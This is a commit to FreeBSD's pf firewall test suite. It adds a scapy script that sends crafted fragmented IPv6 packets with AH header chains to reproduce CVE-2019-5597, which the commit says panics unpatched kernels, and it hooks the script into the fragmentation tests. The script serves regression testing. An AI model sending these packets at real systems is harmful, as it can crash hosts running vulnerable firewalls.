pf tests: Test CVE-2019-5597

Generate a fragmented packet with different header chains, to provoke
the incorrect behaviour of pf.
Without the fix this will trigger a panic.

Obtained from:	Corentin Bayet, Nicolas Collignon, Luca Moro at Synacktiv

tests/sys/netpfil/pf/CVE-2019-5597.py

@@ -0,0 +1,35 @@
+#!/usr/local/bin/python2.7
+
+import random
+import scapy.all as sp
+import sys
+
+UDP_PROTO  = 17
+AH_PROTO   = 51
+FRAG_PROTO = 44
+
+def main():
+    intf = sys.argv[1]
+    ipv6_src = sys.argv[2]
+    ipv6_dst = sys.argv[3]
+
+    ipv6_main = sp.IPv6(dst=ipv6_dst, src=ipv6_src)
+
+    padding = 8
+    fid = random.randint(0,100000)
+    frag_0 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=1, offset=0)
+    frag_1 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=0, offset=padding/8)
+    
+    pkt1_opts = sp.AH(nh=AH_PROTO, payloadlen=200) \
+            / sp.Raw('XXXX' * 199) \
+            / sp.AH(nh=FRAG_PROTO, payloadlen=1) \
+            / frag_1
+
+    pkt0 = sp.Ether() / ipv6_main / frag_0 / sp.Raw('A' * padding)
+    pkt1 = sp.Ether() / ipv6_main / pkt1_opts / sp.Raw('B' * padding)
+
+    sp.sendp(pkt0, iface=intf, verbose=False)
+    sp.sendp(pkt1, iface=intf, verbose=False)
+
+if __name__ == '__main__':
+	main()

tests/sys/netpfil/pf/Makefile

@@ -20,8 +20,10 @@ ATF_TESTS_SH+=	anchor \
 
 ${PACKAGE}FILES+=	utils.subr \
 			echo_inetd.conf \
-			pft_ping.py
+			pft_ping.py \
+			CVE-2019-5597.py
 
 ${PACKAGE}FILESMODE_pft_ping.py=	0555
+${PACKAGE}FILESMODE_CVE-2019-5597.py=	0555
 
 .include <bsd.test.mk>

tests/sys/netpfil/pf/fragmentation.sh

@@ -104,6 +104,11 @@ v6_body()
 
 	atf_check -s exit:0 -o ignore\
 		ping6 -c 1 -b 70000 -s 65000 2001:db8:43::3
+
+	$(atf_get_srcdir)/CVE-2019-5597.py \
+		${epair_send}a \
+		2001:db8:42::1 \
+		2001:db8:43::3
 }
 
 v6_cleanup()